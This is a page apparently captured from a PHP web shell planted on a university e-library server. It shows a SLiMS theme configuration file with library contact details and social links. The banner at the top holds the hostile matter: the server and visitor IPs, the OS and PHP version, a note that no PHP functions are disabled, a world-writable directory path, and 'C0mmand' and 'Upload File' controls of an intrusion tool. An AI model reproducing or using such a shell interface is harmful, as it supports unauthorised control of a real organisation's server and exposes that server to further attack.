Server IP : 103.11.96.170 / Your IP : 18.218.146.21 Web Server : Microsoft-IIS/10.0 System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64 User : elibrary.unsap.ac.id ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : D:/localhost/elibrary/repository/../template/default/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * @Created by : Waris Agung Widodo (ido.alit@gmail.com) * @Date : 2020-01-02 15:12 * @File name : tinfo.inc.php */ $sysconf['template']['base'] = 'php'; $sysconf['template']['responsive'] = false; $sysconf['template']['classic_library_subname'] = 0; $sysconf['template']['classic_slide_transition'] = 'blur'; $sysconf['template']['classic_slide_animation'] = 'none'; $sysconf['template']['classic_slide_delay'] = 5000; $sysconf['template']['classic_popular_collection'] = 1; $sysconf['template']['classic_popular_collection_item'] = 6; $sysconf['template']['classic_new_collection'] = 1; $sysconf['template']['classic_new_collection_item'] = 6; $sysconf['template']['classic_top_reader'] = 1; $sysconf['template']['classic_suggestion'] = 1; $sysconf['template']['classic_map'] = 1; $sysconf['template']['classic_map_link'] = 'https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d253464.70846378335!2d107.63872559197904!3d-6.963701471474247!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x2e68d134803226a9%3A0x1b0a2ac71fe55ece!2sUniversitas%20Sebelas%20April!5e0!3m2!1sen!2sid!4v1654526804434!5m2!1sen!2sid'; $sysconf['template']['classic_map_desc'] = 'Merupakan layanan terpadu dalam kegiatan Perpustakaan berbasis digitalisasi.<br><br>Telp. 0261210223<br>Email. elib@unsap.ac.id<br>'; $sysconf['template']['classic_fb_link'] = 'https://www.facebook.com/groups/universitassebelasapril'; $sysconf['template']['classic_twitter_link'] = 'https://twitter.com/unsap'; $sysconf['template']['classic_youtube_link'] = 'https://www.youtube.com/c/UniversitasSebelasAprilSumedang/videos'; $sysconf['template']['classic_linkedin_link'] = 'https://www.linkedin.com/company/universitas-sebelas-april-sumedang'; $sysconf['template']['classic_instagram_link'] = 'https://www.instagram.com/unsap_smd/'; $sysconf['template']['option'][$sysconf['template']['theme']] = [ 'responsive' => [ 'dbfield' => 'responsive', 'label' => 'Enable this theme for mobile?', 'type' => 'dropdown', 'default' => 0, 'data' => [ [1, 'Yes, please!'], [0, 'No, I want use lighweight theme'] ] ], 'subtitle' => [ 'dbfield' => 'classic_library_subname', 'label' => 'Library Sub Name', 'type' => 'dropdown', 'default' => 0, 'data' => [ [1, 'Show'], [0, 'Hide'] ] ], 'transition' => [ 'dbfield' => 'classic_slide_transition', 'label' => 'Slide Transition', 'type' => 'dropdown', 'default' => 'fade', 'data' => [ ['fade', 'Fade'], ['slideLeft', 'Slide Left'], ['slideRight', 'Slide Right'], ['slideUp', 'Slide Up'], ['slideDown', 'Slide Down'], ['zoomIn', 'Zoom In'], ['burn', 'Burn'], ['flash', 'Flash'] ] ], 'animation' => [ 'dbfield' => 'classic_slide_animation', 'label' => 'Slide Animation', 'type' => 'dropdown', 'default' => 'none', 'data' => [ ['none', 'None'], ['random', 'Random'], ['kenburns', 'Kenburns'], ['kenburnsUp', 'Kenburns Up'], ['kenburnsDown', 'Kenburns Down'], ['kenburnsLeft', 'Kenburns Left'], ['kenburnsRight', 'Kenburns Right'], ['kenburnsUpLeft', 'Kenburns Up-Left'], ['kenburnsUpRight', 'Kenburns Up-Right'], ['kenburnsDownLeft', 'Kenburns Down-Left'], ['kenburnsDownRight', 'Kenburns Down-Right'], ] ], 'delay' => [ 'dbfield' => 'classic_slide_delay', 'label' => 'Delay', 'type' => 'text', 'default' => 5000 ], 'popular-collection' => [ 'dbfield' => 'classic_popular_collection', 'label' => 'Popular Collection', 'type' => 'dropdown', 'default' => 1, 'data' => [ [1, 'Show'], [0, 'Hide'] ] ], 'popular-collection-item' => [ 'dbfield' => 'classic_popular_collection_item', 'label' => 'Popular Items', 'type' => 'text', 'default' => 6 ], 'new-collection' => [ 'dbfield' => 'classic_new_collection', 'label' => 'New Collection', 'type' => 'dropdown', 'default' => 1, 'data' => [ [1, 'Show'], [0, 'Hide'] ] ], 'new-collection-item' => [ 'dbfield' => 'classic_new_collection_item', 'label' => 'New Items', 'type' => 'text', 'default' => 6 ], 'top-reader' => [ 'dbfield' => 'classic_top_reader', 'label' => 'Top Reader', 'type' => 'dropdown', 'default' => 1, 'data' => [ [1, 'Show'], [0, 'Hide'] ] ], 'suggestion' => [ 'dbfield' => 'classic_suggestion', 'label' => 'Suggestion', 'type' => 'dropdown', 'default' => 1, 'data' => [ [1, 'Show'], [0, 'Hide'] ] ], 'map' => [ 'dbfield' => 'classic_map', 'label' => 'Map', 'type' => 'dropdown', 'default' => 1, 'data' => [ [1, 'Show'], [0, 'Hide'] ] ], 'map-link' => [ 'dbfield' => 'classic_map_link', 'label' => 'Map URL', 'type' => 'longtext', 'default' => 'https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d253464.70846378335!2d107.63872559197904!3d-6.963701471474247!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x2e68d134803226a9%3A0x1b0a2ac71fe55ece!2sUniversitas%20Sebelas%20April!5e0!3m2!1sen!2sid!4v1654526804434!5m2!1sen!2sid', # 'default' => 'https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3966.288723306273!2d106.80038831428296!3d-6.225610995493402!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x2e69f14efd9abf05%3A0x1659580cc6981749!2sPerpustakaan+Kemendikbud!5e0!3m2!1sid!2sid!4v1516601731218', 'width' => '100', 'max' => 1000 ], 'map-desc' => [ 'dbfield' => 'classic_map_desc', 'label' => 'Map Description', 'type' => 'longtext', 'default' => 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque et nunc mi. Donec vehicula turpis a quam venenatis posuere. Aliquam nibh lectus, gravida et leo sit amet, dignissim dapibus mauris.<br>Telp. (021) 9172638<br>Fax. (021) 9172638<br>', 'width' => '100', 'max' => 1000 ], 'fb-link' => [ 'dbfield' => 'classic_fb_link', 'label' => 'Facebook URL', 'type' => 'longtext', 'default' => 'https://www.facebook.com/groups/senayan.slims', 'width' => '100', 'max' => 1000 ], 'twitter-link' => [ 'dbfield' => 'classic_twitter_link', 'label' => 'Twitter URL', 'type' => 'longtext', 'default' => 'https://twitter.com/slims_official', 'width' => '100', 'max' => 1000 ], 'youtube-link' => [ 'dbfield' => 'classic_youtube_link', 'label' => 'Youtube URL', 'type' => 'longtext', 'default' => 'https://youtube.com', 'width' => '100', 'max' => 1000 ], 'linkedin-link' => [ 'dbfield' => 'classic_linkedin_link', 'label' => 'Linkedin URL', 'type' => 'longtext', 'default' => 'https://linkedin', 'width' => '100', 'max' => 1000 ], ];